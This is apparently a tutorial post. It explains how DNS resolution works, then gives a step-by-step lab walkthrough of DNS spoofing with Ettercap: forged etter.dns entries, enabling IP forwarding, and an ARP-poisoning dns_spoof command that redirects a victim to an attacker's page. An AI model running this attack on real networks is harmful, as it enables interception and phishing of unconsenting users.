DNS stands for Domain Name System. Its job is to translate the name of a website you enter in the address bar into an IP address.
When you enter www.google.com into the address bar, the name is translated to its IP address, and only after that is a connection established.
Here’s how the process goes:
1. You enter the hostname www.xyz.com into the address bar
2. Your computer searches for the IP in the local DNS cache. If it’s not found, a DNS query is performed.
3. The query is sent to recursive name servers – these are typically run by your ISP and have their own cache.
4. If the recursive servers don’t have the answer, they will query the root nameserver.
5. The root nameserver reads your request from right to left, starting with the TLD (.com, .in, .us).
6. The query is then directed to the top level domain (TLD) nameserver
7. The TLD nameserver reads the next label from the right (everything minus the TLD part) to find the specific domain.
8. Finally, the query goes to the authoritative DNS servers. These know everything there is to know about a domain and hold its DNS records (A, MX, etc.); the recursive server retrieves the record and returns it to you.
Common DNS records:
A = forward DNS lookup (hostname to IPv4 address)
MX = mail exchange record (which servers accept mail for the domain)
PTR = reverse DNS lookup (IP address to hostname)
What’s a nameserver?
A computer that’s permanently connected to the internet and translates a domain name into an IP address.
What’s Ettercap?
Ettercap is a free and open source network security tool for man-in-the-middle attacks on a LAN. It can be used for computer network protocol analysis and security auditing.
Spoofing DNS using Ettercap
The victim will try to connect to msn.com and instead will see the attacker hosted webpage.
Scenario: 2 machines – Kali Linux and Windows 8
On Kali Linux
1. Locate the file named etter.dns
#locate etter.dns
The file will be under /etc/ettercap.
Open the file using the nano editor.
Scroll down and you'll see a line:
*wildcards in PTR are not allowed
There will be examples given; add your entry in the same format.
for instance -> www.msn.com A 192.168.1.8
where A is the DNS record type, and the IP is that of your Kali Linux machine.
Save and exit.
2. Go to this directory:
/proc/sys/net/ipv4
There will be a file named ip_forward.
Open the file with nano and you'll find that it's set to 0. Change it to 1.
Save and exit.
3. Use the dns_spoof plugin of ettercap:
# ettercap -T -q -M arp:remote -P dns_spoof //
and the plugin will start.
(enter q to abort)
(run ettercap --help to see the options)
Go to your Windows machine and ping the msn website.
You'll see that the reply is received from 192.168.1.8 – the Kali machine – instead of msn.com's real IP.
Similarly, if you were to enter www.msn.com in the browser on Windows, you'll be redirected to the Kali Linux machine, where you can host your own page for malicious / non-malicious intent.
All of this will make much more sense if you familiarize yourself with ARP spoofing.